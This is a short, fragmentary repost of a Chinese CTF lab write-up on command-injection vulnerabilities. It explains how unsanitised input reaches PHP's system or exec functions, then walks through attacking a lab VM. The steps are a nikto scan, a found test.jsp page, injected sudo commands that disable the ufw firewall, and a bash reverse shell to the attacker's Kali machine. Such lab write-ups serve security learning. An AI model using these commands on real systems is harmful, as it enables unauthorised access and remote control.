前言 作者简介:不知名白帽,网络安全学习者。 博客主页:https://blog.csdn.net/m0_63127854?type=blog CTF-专栏:https://blog.csdn.net/m0_63127854/ca
前言
博客主页:https://blog.csdn.net/m0_63127854?type=blog
CTF-专栏:https://blog.csdn.net/m0_63127854/category_11835386.html
目录
当应用需要调用一些外部应用程序去处理内容的情况下,就会用到一些执行系统命令的函数。如PHP中的system、exec、shell_exec等,当用户可以控制命令执行函数中的参数时,将可以注入恶意命令到正常命令中,造成命令执行攻击。
调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,有没有多虑用户输入的情况下,就会造成命令执行漏洞。
kali 192.168.20.128
靶机 192.168.20.136
链接:https://pan.baidu.com/s/1OgpClNu8ggDEc_DBTRD57Q
提取码:t1x0
发现敏感信息
nikto -host http://192.168.20.136:8080
发现/test.jsp并进行访问
ssh bill@localhost sudo -l
ssh bill@localhost sudo ufw disable
ssh bill@localhost sudo bash -i >& /dev/tcp/192.168.20.128/4444 0>&1
来源地址:https://blog.csdn.net/m0_63127854/article/details/126694788
--结束END--
本文标题: CTF-命令执行【超详细】
本文链接: https://lsjlt.com/news/386203.html(转载时请注明来源链接)
有问题或投稿请发送至: 邮箱/279061341@qq.com QQ/279061341
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
2024-02-29
回答
回答
回答
回答
回答
回答
回答
回答
回答
回答
0